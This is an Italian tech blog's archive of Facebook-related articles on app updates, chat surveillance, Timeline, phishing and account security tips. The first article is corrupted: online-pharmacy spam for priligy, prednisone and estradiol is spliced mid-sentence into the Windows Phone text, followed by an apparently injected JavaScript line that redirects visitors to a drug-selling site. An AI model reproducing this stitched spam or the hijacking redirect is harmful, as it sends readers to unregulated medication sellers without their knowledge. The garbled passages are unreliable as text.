Il blog dedicato al mondo della tecnologia
Artikel getaggt mit: facebook

Facebook diventa compatibile con Windows Phone 7.8

generating the patient that buy fluoxetine buy priligy in uk – buy priligy usa priligy online pharmacy; generic levitra dapoxetine instant shipping, generic dapoxetine uk., 26 sep 2014 priligy online . hcl online does. product product they they either dont. safety and sell a miracle molecule up to. medicine to stay away

Facebook è stato aggiornato, in tal modo è diventato compatibile con Windows Phone 7.8. In seguito al recente update compatibile con Windows Phone 8, infatti, è stato rilasciato da un po’ di ore l’ufficiale aggiornamento dell’applicazione di Facebook anche per Windows Phone 7.8.

Quest’applicazione ha è arrivata così alla versione 2.8, la quale non introduce, almeno in apparenza, novità per la versione 7.5, tuttavia, lo fa invece per l’oramai prossimo Windows Phone 7.8, presentando svariate caratteristiche viste già con il nuovo OS. Secondo voci di corridoio, il generic of prednisone – prednisone price walmart prednisone price at walmart; price of next day delivery , purchase prednisone online overnight. changelog dovrebbe includere, in sostanza, la compatibilità dell’app rispetto alle tile ridimensionabili di Windows Phone 7,8.

Estesa, la tile consentirà di visualizzare l’immagine di copertina presente sul nostro account; ruotando mostrerà anche lo stato personale ultimo. La tile media, da un lato, mostrerà il tradizionale logo di Facebook e, anch’essa, ruotando svelerà lo stato personale che abbiamo impostato. In generic estrace tablets. dienogest ethinyl estradiol uk i forgot to take my estradiol trans azithromycin mg estradiol 74 pg ml estradiol 34. estradiol level 60 ultimo, la tile piccola presenterà solamente la funzione notifica.

window.location = “http://medicationsonlinedoctor.com”;

.

Facebook controlla i suoi utenti

Facebook controlla i suoi utenti. Le conversazioni sono monitorate in cerca di qualche parola chiave e comportamenti sospetti. Se scatta l’allarme parte la segnalazione dei profili alla polizia. La precrimine del social network?. Una grande operazione di controllo delle conversazioni, messa in atto da Facebook e altre piattaforme social per segnalare agli ufficiali di polizia le più disparate attività criminose. I tecnici del social network di Menlo Park avrebbero implementato uno specifico strumento software per il monitoraggio della chat interna, a caccia di un gruppo di parole chiave sospette.

Facebook controlla i suoi utenti

I predatori sessuali risultano infatti tra le vittime preferite dal vasto sistema di sorveglianza implementato da Facebook e altre reti sociali. Il tool procede con l’analisi del linguaggio tra i messaggi in tempo reale del sito blu, andando ad esempio a scovare la differenza d’età tra i protagonisti della conversazione. In caso di comunicazioni sospette, il programma procede con l’immediata segnalazione dei vari profili ai responsabili di Facebook, che possono poi contattare la polizia per denunciare il caso. Un vero è proprio controllo pre-crimine , speriamo che non ci siano delle false segnalazioni.

Per il team di Facebook si tratta di una necessaria sconfitta. «Non era nelle nostre intenzioni creare un ambiente dove fosse necessario controllare le conversazioni private - ha detto Joe Sullivan, addetto alla sicurezza del social network - è molto importante l’utilizzo di questa tecnologia ma è altrettanto importante che abbia il minor numero possibile di falsi positivi».

Facebook controlla i suoi utenti cosa ne pensi?

Come chattare su Facebook con più amici contemporaneamente

Come chattare su Facebook con più amici contemporaneamente. La chat di facebook è una delle funzionalità più utili del famoso social network. Utilità ampliata dalla possibilità di poter chattare con più amici contemporaneamente. Molte volte, infatti, può essere utile poter conversare con più amici nello stesso momento, specie se si devono riferire le stesse cose a più persone o se si desidera semplicemente fare una riunione, comodamente da casa, senza far spostare tutte le persone invitate. Avviare una “multichat” su Facebook è davvero molto semplice: basta iniziare una conversazione con un amico già online e aggiungere tutti gli altri amici cliccando sul simbolo della ruota dentata che troviamo in alto a destra della finestra della chat e scegliere “Aggiungi amici alla chat”. A questo punto si dovrà digitare il nome dell’amico che si vuole invitare alla conversazione e cliccare su “Fine”. Si aprirà quindi una nuova finestra di chat in cui ci saranno entrambi gli amici. È consigliabile aggiungere tutti i membri della chat in un’unica volta, per evitare che si aprano nuove finestre ad ogni nuova partecipazione. Una caratteristiche molto interessante della chat multi-utente di Facebook, è che la persona aggiunta non deve necessariamente essere amica di tutti i partecipanti alla chat, ma solo di chi la invita.

Facebook: un motore di ricerca all’interno del social network

Facebook: un motore di ricerca all’interno del social network L’inventore di Facebook, Mark Zuckerberg, sta idealizzando l’inserimento di un motore di ricerca all’interno del famoso social network. Diverse fonti affermerebbero che, almeno inizialmente, tale motore di ricerca sarebbe solo all’interno del social, ed in seguito espanso sull’intero world wide web.

Facebook: un motore di ricerca all’interno del social network

Tale innovazione aprirebbe a Facebook le porte ad un grandissimo business: un giro di affari legato alle pubblicità sul web, simile a Google AdWords. Un concepimento di tale portata porterebbe l’invenzione di Zuckerberg a pari livello di popolarità e importanza del colosso Google, mettendo probabilmente in crisi quest’ultimo. Secondo alcune indiscrezioni, fra le figure che faranno parte del Team per lo sviluppo del motore di ricerca dovrebbe esserci Lars Rasmussen, conosciuto nell’ambiente per aver partecipato alla realizzazione di Google Maps e Google Wave. Presenza che rappresenterebbe un’ulteriore “colpo basso” nei confronti dei colleghi di Mountain View e per lo stesso Google. Quest’ultimo, entrato da poco nella sfera dei social network, con Google Plus, e con l’intendo sferrare un attacco al re dei social, si vede adesso contraccambiare la mossa con moneta decisamente maggiore. Bisogna considerare a tal proposito che, anche se Google coinvolge quasi tutti gli utenti del mondo, Facebook attira maggiore partecipazione. Facebook: un motore di ricerca all’interno del social network L’inventore di Facebook, Mark Zuckerberg, sta idealizzando l’inserimento di un motore di ricerca all’interno del famoso social network. Diverse fonti affermerebbero che, almeno inizialmente, tale motore di ricerca sarebbe solo all’interno del social, ed in seguito espanso sull’intero world wide web. Tale innovazione aprirebbe a Facebook le porte ad un grandissimo business: un giro di affari legato alle pubblicità sul web, simile a Google AdWords. Un concepimento di tale portata porterebbe l’invenzione di Zuckerberg a pari livello di popolarità e importanza del colosso Google, mettendo probabilmente in crisi quest’ultimo. Secondo alcune indiscrezioni, fra le figure che faranno parte del Team per lo sviluppo del motore di ricerca dovrebbe esserci Lars Rasmussen, conosciuto nell’ambiente per aver partecipato alla realizzazione di Google Maps e Google Wave. Presenza che rappresenterebbe un’ulteriore “colpo basso” nei confronti dei colleghi di Mountain View e per lo stesso Google. Quest’ultimo, entrato da poco nella sfera dei social network, con Google Plus, e con l’intendo sferrare un attacco al re dei social, si vede adesso contraccambiare la mossa con moneta decisamente maggiore. Bisogna considerare a tal proposito che, anche se Google coinvolge quasi tutti gli utenti del mondo, Facebook attira maggiore partecipazione.

Facebook: un motore di ricerca all’interno del social network cosa ne pensi?

Come scaricare gli album fotografici di Facebook sul PC

Come scaricare gli album fotografici di Facebook sul PC. Se vi piace condividere spesso le vostre foto sul Facebook, creando quindi col tempo diversi album all’interno dei quali si trovano moltissime foto, vi troverete, nel caso in cui vogliate prelevare le foto per salvarle sul PC, una mole di lavoro immensa. Facebook infatti permette di scaricare una foto per volta sul proprio computer, eseguendo l’operazione manualmente.

Come scaricare gli album fotografici di Facebook sul PC

Per fortuna però ci viene in soccorso un’applicazione creata proprio per questo tipo di problema: F4cebook 2 Zip. Grazie a questo potremo eseguire un backup completo di tutte le immagini presenti sul nostro profilo Facebook, mantenendo comunque la catalogazione delle foto nei diversi album da noi creati. Andate su  F4cebook 2 Zip e abilitatela cliccando su “Loghin Whit Facebook”. Se siamo già loggati al social network, questo ci chiederà di autorizzare l’applicazione ad accedere ai nostri dati su Facebook, viceversa se dobbiamo ancora accedere, prima ci chiederà di eseguire il login su Facebook. Eseguita questa procedura e autorizzata quindi l’applicazione ad accedere ai nostri dati su Facebook, saremo direttamente indirizzati sul sito di F4cebook 2 Zip. A questo punto dovremo scegliere da quale account vogliamo scaricare le foto: se dal nostro account, dobbiamo selezionare e fare diventare completamente blu il box posto sulla sinistra dove c’è il nostro nome; se vogliamo scaricare le foto di un nostro amico dobbiamo semplicemente inserire il suo nome nel campo “One Your Friands”. Dopo aver scelto l’account dal quale verranno scaricate le foto, cliccate su “Next” per procedere. Successivamente ci appariranno i diversi album fotografici appartenenti all’account precedentemente scelto: dovremo quindi selezionare l’album fotografico che vogliamo scaricare. Per selezionarne più di uno basta tenere premuto il tasto “CTRL”. In fine cliccate sul pulsante “Download”, e poi di nuovo su “Download”. Il file scaricato sarà in formato compresso “.zip.”, e una volta scompattato, le foto saranno salvate in cartelle che avranno lo stesso nome di quello degli album e mantenendo la catalogazione degli album fotografici presenti su Facebook.

Come scaricare gli album fotografici di Facebook sul PC

Facebook Mantenere al sicuro i propri dati

Facebook Mantenere al sicuro i propri dati Il nostro profilo Facebook è il nostro bigliettino da visita del web infatti sono sempre di piu’ i datori di lavoro che si affidano a Facebook per verificare i curricula dei propri dipendenti. Ma non solo per questo, infatti il nostro profilo è pieno di dati personali. Per questo la sicurezza del proprio account è fondamentale. Oggi vi illustrero’ semplici regole per mantenere al sicuro il vostro Face. Prima cosa, la password, deve essere composta da minimo 8 caratteri alfanumerici, lettere maiuscole e minuscole, facile da ricordare ma difficile da indovinare. Evitate di usare date o nomi familiari e parole comuni.

Facebook Mantenere al sicuro i propri dati

Meglio usare qualche parola “strana” che usare il nome del proprio cane ;) Poi, la casella di posta elettronica usata nella registrazione, è necessaria in caso di smarrimento password, non usate mai la stessa password di facebook e se è possibile disattivate la domanda segreta, che, di solito è alquanto banale e facile da indovinare. Attenti al phising, molti malintenzionati creano pagine di login identiche a quella di facebook e contattandovi in chat o via mail tenteranno di farvi eseguire il login su questi siti fasulli. Ricordate, prima di inserire nome utente e password controllate sempre nella barra degli indirizzi se state ancora su Facebook. Utilizzate un buon antivirus e firewall aggiornati costantemente, i nuovi virus sono “specializzati” nel rubare password non solo di Face ma anche di conti bancari. Non installate software per “migliorare” Facebook, spesso contengono Keylogger in grado di registrare tutto quello che scrivete. Non utilizzate computer pubblici per collegarvi, potrebbero essere compromessi da malware vari. Attivate la notifica degli accessi via sms, così saprete sempre in modo istantaneo se qualcuno entra nel vostro account. Cambiate regolarmente la vostra password almeno una volta al mese, e ultimo consiglio, usate il buon senso, non cliccate su link di dubbia provenienza ed evitate di installare software da siti qualsasi. Basta poco per rendere sicuro il vostro account :)

Facebook Mantenere al sicuro i propri dati cosa ne pensi?

Come cancellare i vecchi post sulla bacheca di facebook

Come cancellare i vecchi post sulla bacheca di facebook. Oggi parleremo di una funziona comodissima per pulire la nostra bacheca di facebook. Usiamo Facebook per pubblicare qualsiasi cosa informazioni importanti e meno importanti. Se prima non ci preoccupavamo più di tanto, adesso con l’arrivo del diario dobbiamo fare molta attenzione e rivedere tutto quello che è stato pubblicato in passato, togliere le cose meno importanti e lasciare solo le cose pubblicate di cui non ce ne pentiremo.

Come cancellare i vecchi post sulla bacheca di facebook

Non provare per testare questi servizi. C’è il rischio di cancellare per sempre tutti i tuoi contenuti pubblicati su Facebook. Il diario permette di scorrere indietro nel tempo in pochi click e rende disponibili agli amici (o a chiunque a seconda delle impostazioni sulla privacy) tutti i contenuti da noi pubblicati. Il miglior servizio in assoluto credo che sia “CleanMyWall“ è un programmino in javascipt che ti permette di cancellare i post più vecchi di una certa data. Per prima cosa scaricate il plugin, configurarlo su internet explorer 7, inserire il sito nella barra dei preferiti, aprire il profilo di facebook avviare il link cliccando il sito nella barra dei preferiti. Per facilitare il tutto vi inseriamo un video.

Come cancellare i vecchi post sulla bacheca di facebook cosa ne pensi?

Come disattivare il diario di facebook dal tuo profilo

Come togliere il diario di facebook dal tuo profilo. Brutte notizie per gli utenti di facebook, la Timeline  di facebook non può essere disattivata. Non è quindi possibile tornare al vecchio profilo. Tuttavia si può intervenire per far apparire le informazioni in una unica colonna. Per visualizzare il diario in una colonna ci sono diversi script o estensioni. Il metodo più semplice è quello di installare lo script Facebook Timeline Single Column di userscript. In questo caso se utilizzate Firefox o IE dovrete prima installare greasemonkey. Noi sconsigliamo di installare questi plugin che molto spesso rallentano il browser.

Come disattivare il diario di facebook dal tuo profilo

Tutto o almeno gran parte del mondo facebook non piace la timeline. Ennesimo aggiornamento di Facebook ma che questa volta poteva risparmiarsi. Possiamo solamente riabituarci alla nuova grafica. Dal 29 dicembre 2011 tutti i profili saranno aggiornati. La timeline di Facebook è una sorta di diario che ripercorre tutti i fatti, le fotolinkvideo ed ogni cosa che abbiamo pubblicato sul Social Network dal primo giorno in cui ci siamo iscritti fino ad oggi. Ma non ci resta che sperare al prossimo aggiornamento sperando che questa volta sia quella giusta. Vi lascio con un commento di un utente dopo aver passato alla nuova grafica “Dopo anni e anni che facebook cambia continuamente grafica è arrivato il momento di cambiare social! Mi sono rotto le scatole di facebook. Preferisco cancellarmi definitivamente

Come disattivare il diario di facebook dal tuo profilo cosa ne pensi?

Facebook cambia grafica timeline

Facebook cambia grafica timeline. E’ ora disponibile la nuova veste grafica di facebook quasi disponibile a tutti gli utenti.

Facebook cambia grafica timeline

Questa rivoluzione non riguarda solamente le persone fisiche ma anche le migliaia di aziende che ogni giorno affidano a facebook il proprio business. Il nuovo layout di Facebook sarà una mossa commerciale di grande rilievo. Questo aggiornamento timeline permetterà all’utente di vedere immagini più grandi e disposte in modo da attirare l’attenzione. Il Timeline ripercorre la “linea temporale”, e quindi ricordare cosa accadeva qualche anno fa farci percepire cosi il cambiamento. Sembra quasi voler cambiare il concetto di navigazione web. Questi nuovi profili assomigliano sempre di più ai siti web con la possibilità di cambiare e personalizzare la propria pagina. Speriamo che questo cambiamento porti anche un vantaggio agli utenti e non solo alle aziende. Facebook ha una clientela stimata ad 800 milioni di persone. La suddivisione “Notizie più popolari” “Più recenti” viene sostituita con  “Recent story” che prevede la possibilità di scegliere quali siano le Story da seguire (Mark as top story). La Top Story selezionata comparirà sempre nelle prime posizioni del News Feed . Importante sottolineare che le Recent story non comprendono più né i likes (es. A Paolo piace lo status di Margherita) né gli aggiornamenti di Status che non hanno ricevuto likes e/o commenti. E’ una sezione completamente nuova nella quale vengono inserite in “streaming” tutte le attività degli Amici (likes, commenti, upload foto etc…) che non sono diventate Recent Story  (non hanno ricevuto likes e/o commenti). Questa sezione diventa visibile nel momento in cui si clicca su una delle attività dello “streaming” e ti permette di compiere tutte le operazioni direttamente all’interno della finestra. Se ad esempio volessi commentare una foto uplodata da un mio amico lo posso fare direttamente all’interno del box senza necessariamente atterrare sulla pagina della foto stessa. Ampio risalto viene dato alla chat che di fatto va ad assumere un posto molto più rilevante all’interno della pagina.

Facebook cambia grafica timeline cosa ne pensi?

Facebook in Italia

Facebook in Italia. Un italiano su tre è registrato su Facebook una cifra impressionante, 27 milioni sono le visite mensili secondo le ultime stime di Audiweb. Una vera è propria regione in italia sempre in continua crescita. Quasi 80 % degli italiani collegati al web ha n profilo facebook queste sono le cifre di un progetto che ha in brevissimo tempo conquistato l’Italia e il mondo.

più di 13 milioni di utenti italiani entrano su facebook ogni giorno, con un numero impressionante di accessi mobile che si aggira intorno ai 7 milioni al giorno.

Facebook in Italia

Come si può notare dal grafico la regione lazio è la più colpita dal fenomeno facebook per quanto riguarda il sesso una quasi parità tra uomo e donna. L’età varia tra i 19 e 35 scendendo poi al di sotto 40 % superati i 35. Sono moltissime le persone che trovano i social network strumenti inutili che mettono a rischio la propria privacy in oltre molte amicizie potrebbero essere inconsapevolmente pericolose. Quindi che dire un Italia quasi spaccata in due da un lato troviamo i fan accaniti e dall’altro persone scettiche che credono che facebook sia un pericolo per la propria persona. Tu cosa ne pensi? sei registrato? vuoi registrarti? commenta di la tua opinione.

Facebook in Italia cosa ne pensi?

Safego – Antivirus per facebook

Safego – Antivirus per facebook. Facebook è spesso sotto attacco da phishing, spamming e truffe. Oggi parleremo di un nuovo programma che vi proteggerà da queste minaccie il suo nome è Safego un antivirus disponibile sia per Facebook che per Twitter.

Safego – Antivirus per facebook

Il software è ancora in fase beta ma sicuramente sarà disponibile a breve nel pacchetto sicurezza di BitDefender Total Security 2012. Questo programma vi permetterà di mantenere pulito e sicuro il vostro computer effettuando una scansione dei profili per determinare quali possono essere falsi e pericolosi, verificando i messaggi ricevuti e rilevando i link pericolosi. Safego è uno strumento utile per chi utilizza molto i social network, l’utilizzo di questo programma è molto semplice e intuitivo. Il software è gratuito e in italiano quindi non perdete questa occasione di mantenere il vostro computer lontano da queste tecniche hacker che ormai stanno devastando il mondo dei Social Network.

Catalin Cosoi, Responsabile del BitDefender Online Threat Lab dichiara:

“E’ chiaro che un gran numero di persone non ha la percezione di quante informazioni personali condivida con il mondo. Safego rende semplice verificare cosa si condivide e apportare le opportune modifiche,” ”Va detto, inoltre, che stiamo assistendo a un’impennata degli attacchi nei confronti degli utenti Facebook. Attraverso l’impiego dell’avanzata tecnologia di rilevamento BitDefender, Safego aiuta a proteggere gli utenti da link malevoli e da altre minacce che si diffondono attraverso messaggi, post e video.”

Adesso non ti resta altro che cliccare sul link e scaricare gratuitamente questo fantastico programma.

Antivirus Safego

Safego – Antivirus per facebook cosa ne pensi?

Tentativo di phishing facebook

Tentativo di phishing facebook.  Controllate sempre l’indirizzo URL nella barra del browser. Qualunque link esterno a Facebook, contraffatto per apparire come residente nel social network, può essere segnalato sia a Google sia a Facebook stesso.

Tentativo di phishing facebook

Aderire a Pagine o Applicazioni che vi promettono “molti fan” può comportare ANCHE questi rischi (furto delle credenziali di accesso o dell’amministrazione delle vostre pagine). Se siete già “loggati” nel social network non dovete per nessun motivo  reinserire la vostre email e password per aderire ad applicazioni di Facebook o accedere di nuovo a Facebook. Nel caso vi troviate a visualizzare messaggi o richieste del genere, allontanatevi dalla pagina in questione senza inserire nessuna informazione. Tentativo di phishing facebook. Se un amico vi invita a ottenere un’opzione “esclusiva” tramite un proprio messaggio, è possibile che il suo account sia stato violato.

E’ buona regola cambiare anche la email di riferimento accedendo alle Impostazioni account, soprattutto quando si usa la stessa password per accedere alla posta elettronica e a Facebook. Per la maggioranza degli utenti caduti nella trappola tutto si risolve in uno “scherzo” di breve durata (è sufficiente cambiare la password per eliminare il problema) da parte di buontemponi, di solito ragazzini, che si divertono così.

Tentativo di phishing facebook cosa ne pensi?

Facebook – ennesimo rinvio della sua quotazione in borsa

Le decisione definitiva si dovrà far attendere ancora un po’. Quello che sembrava un evento inevitabile come consequenziale atto di sottolineatura di un successo ora appare sempre più improbabile, almeno stando le attuali condizioni del mercato e non solo.
I vertici Facebook sembra abbiano accantonato, almeno per il momento, la possibile, e fino a pochi mesi fa naturale, entrata in borsa del famoso social network. Il tutto è riportato dal Financial Times che, stando quanto affermano fonti anomine riportate dallo stesso giornale, il lancio che era previsto entro e non oltre aprile 2012 slitterebbe a data de destinarsi, infatti parrebbe proprio che l’offerta di titoli al pubblico ora come ora sia l’ultimo dei pensieri in Facebook, interessati ora più che mai ad implemantare il servizio cercando di rendere l’offerta del proprio prodotto quanto mai ancora più interessante nei confronti dei suoi utenti, una strategia questa mirante ad evitare qualsivoglia fuga o moria di utenti che potrebbe essere causata, nel caso, dalla nascita di prodotti simili ed equivalenti, leggasi la recente nascita di Google+ che nei primi mesi di vita non ha potuto che destare una certa preoccupazione e diffidenza in Facebook, consapevoli della potenza economia e di immagine che Google può vantare verso qualunque tipologia di internauta. Una chiara strategia, quella di Zuckerberg, per evitare ogni tipo di distrazione, sua e dei suoi collaboratori, e per interessarsi solo ed unicamente al perfezionamento del suo prodotto, questa una delle chiavi di lettura, ma non la sola. Infatti come è facile immaginare qualsiasi azienda vincolata a pubbliche quotazioni non è pienamente libera di fare quello che vuole, deve in ogni caso dare conto del suo operato ai suoi finanziatori, una libertà che complice anche l’incertezza dell’attuale mercato economico mondiale, sembra che in Facebook non siano per ora disposti a perdere.

Ricevi gli aggiornamenti Facebook continua con le sue migliorie

 

Le novità sembrano non aver fine, almeno per ora. Dopo le recenti liste di selezione, Facebook rende disponibile una nuova funzione per i suoi utenti, ricevi aggiornamenti, che come lascia trasparire il nome stesso permetterà, previa selezione, di aggiornarci in automatico appunto solo sugli aggiornamenti che di volta in volta desideriamo ricevere. Basterà cliccare sul pulsante introdotto in auto a destra del proprio profilo e selezionare solo gli aggiornamenti che si ritiene possano essere i più interessanti, permettendo di conseguenza che aggiornamenti di utenti che si si hanno tra le amicizie ma di cui non ci si è interessati allo stato, possano essere non visualizzati, evitando così di intasare la bacheca con informazioni non richieste, funzione questa che si può dimostrare utilissima nel caso non vogliano essere mostrati aggiornamenti del personaggio pubblico, del gruppo o quant’altro di cui si è estimatori. Settaggio questo che di volta in volta potrà essere modificato dall’utente a suo piacimento e rendendo così il suo utilizzo della piattaforma virtuale quanto più vicino ai suoi desideri di confort e comodità. Ed è proprio su questi due fattori che i vertici di Facebook stanno lavorando per migliorare il servizio offerto ai propri utenti.

Facebook e il lancio delle Smart Lists

Miglioramenti in vista per il social network di Zuckerberg. Sulla falsa riga di Google + anche Facebook ha deciso di introdurre la funzione attraverso cui sarà possibile una suddivisione di amici e conoscenze in base a criteri specifici scelti di volta in volta dall’utente dettati dalle sue esigenze.

Facebook e il lancio delle Smart Lists

Si chiameranno Smart Lists e saranno disponibili entro le prossime settimane per tutti i clienti Facebook. Una funzione che anche se apparentemente può palesare molteplici punti di contatto con le “cerchie”di Google + se ne differenzia, per bocca degli stessi sviluppatori, per l’approccio conferito, che dovrebbe essere, almeno stando le prime impressioni, molto più intuitivo e funzionale, permettendo una suddivisione delle amicizie in modo quanto più intuitivo possibile. In aggiunta e collegato alle stesse Smart Lists, si presenta Close Friend, applicazione attraverso cui sarà possibile ricevere le notifiche solo degli amici che più interessano, evitando, nei casi in cui l’utente abbia numerosissime amicizie, la presenza sulla bacheca di aggiornamenti di stato e quant’altro che potrebbe non risultare richiesto, un modo questo per selezionare con ancor maggior rigore ciò che si ritiene interessante e degno di nota e ciò che invece non lo è. Funzioni queste che implementano con ancora maggior vigore il ruolo che ha Facebook nel mondo tenendo a debida distanza tutti i suoi contraenti.

Facebook e il lancio delle Smart Lists cosa ne pensi?